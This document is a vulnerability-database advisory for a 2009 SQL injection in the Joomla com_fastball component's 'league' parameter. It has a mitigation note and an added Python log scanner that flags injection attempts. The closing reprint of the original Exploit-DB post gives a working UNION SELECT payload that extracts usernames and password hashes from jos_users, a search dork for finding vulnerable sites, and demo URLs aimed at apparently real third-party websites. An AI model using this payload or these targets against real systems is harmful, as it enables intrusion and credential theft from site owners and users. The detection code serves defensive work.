Vendor: Fastball
By: kaMtiEz
CVSS: 7.5 (HIGH)
Vulnerability: SQL injection
CWE: 89
Product Name: Fastball
Affected Version From: 1.1.2000
Affected Version To: 1.2
Patch Exists: YES
Related CWE: N/A
CPE: a:fastballproductions:fastball
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Joomla Component com_fastball Remote SQL injection vulnerability – (league)

A remote SQL injection vulnerability exists in the Joomla component com_fastball. An attacker can exploit it by sending a specially crafted HTTP request that injects SQL through the vulnerable 'league' parameter of the 'com_fastball' component. This can give the attacker access to sensitive information stored in the database.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to update to the latest version of the application.
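
For sites that cannot confirm when they were patched, the following check scans web-server access logs for com_fastball requests whose 'league' value is not a plain number. It is an added example, not part of the original advisory or the vendor's code; it assumes combined-format access logs and that legitimate league ids are non-negative integers, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate league id is a plain non-negative integer.
VALID_LEAGUE = re.compile(r"^\d{1,10}$")
# Tokens that have no place in a numeric id once the value is URL-decoded.
SQL_TOKENS = re.compile(
    r"\b(union|select|concat(_ws)?|from|information_schema)\b|--|/\*|0x[0-9a-f]+",
    re.IGNORECASE)
# Common/combined log format: client IP, quoted request line, status code.
REQUEST = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def check_request(target):
    """Return a reason string for a suspicious com_fastball request, else None."""
    # parse_qs decodes '+' and %xx, so encoded payloads are seen in clear text.
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "com_fastball" not in query.get("option", []):
        return None
    for value in query.get("league", []):
        if VALID_LEAGUE.match(value):
            continue
        if SQL_TOKENS.search(value):
            return "league contains SQL syntax"
        return "league is not an integer"
    return None

def scan(lines):
    """Return (client_ip, status, reason) for every flagged log line."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        reason = check_request(m.group("target"))
        if reason:
            findings.append((m.group("ip"), m.group("status"), reason))
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Sep/2009:10:00:01 +0000] "GET /index.php?option=com_fastball&league=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [23/Sep/2009:10:00:05 +0000] "GET /index.php?option=com_fastball&league=-1+union+select+1,2,3-- HTTP/1.1" 200 7340',
    '198.51.100.7 - - [23/Sep/2009:10:00:09 +0000] "GET /index.php?option=com_fastball&league=7%27 HTTP/1.1" 500 312',
    '192.0.2.44 - - [23/Sep/2009:10:01:00 +0000] "GET /index.php?option=com_content&id=-1+union+select+1 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, status, reason in scan(SAMPLE_LOG):
        print(f"{ip} status={status}: {reason}")
```

A flagged request that returned status 200 deserves priority review, since the injected query may have executed and returned data.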

Exploit-DB raw data:

########################################################################################################
## Joomla Component com_fastball Remote SQL injection vulnerability - (league)	      		      ##
## Author : kaMtiEz (kamzcrew@gmail.com)							      ##
## Homepage : http://www.indonesiancoder.com    	     					      ##
## Date : September 23, 2009 									      ##
########################################################################################################
# Hello My Name Is :                                                                                  ##
#  __               _____   __  ._____________                                                        ##
# |  | _______     /     \_/  |_|__\_   _____/_______                                                 ##
# |  |/ /\__  \   /  \ /  \   __\  ||    __)_\___   /                                                 ##
# |    <  / __ \_/    Y    \  | |  ||        \/    /                                                  ##
# |__|_ \(____  /\____|__  /__| |__/_______  /_____ \                                                 ##
#      \/     \/         \/                \/      \/ -=- INDONESIAN CODER -=- KILL-9 CREW -=-        ##
########################################################################################################

[ Software Information ]

[+] Vendor : http://www.fastballproductions.com/
[+] Download : http://www.fastballproductions.com/index.php?option=com_digistore&task=list_products&id=1&Itemid=32
[+] version : 1.1.0 - 1.2
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_fastball"
[+] Location : INDONESIA
#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_fastball&league=[INDONESIANCODER]

[ Exploit ]

-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11+from+jos_users--

[ Demo ]

http://diamondblacks.com/index.php?option=com_fastball&league=-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11+from+jos_users--

http://sandiegoturbos.com/index.php?option=com_fastball&league=-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11+from+jos_users--

http://www.unibaseball.co.uk/index.php?option=com_fastball&league=-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11+from+jos_users--

#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy,devil_nongkrong and YOU!!

[ NOTE ] 

[+] thanks to dad and mom .... muach ..
[+] thanks to om tukulesto who always keeps me company and never gets bored of me .. hahaha
[+] aurakasih, why are you so hard to get hold of ?? .. hha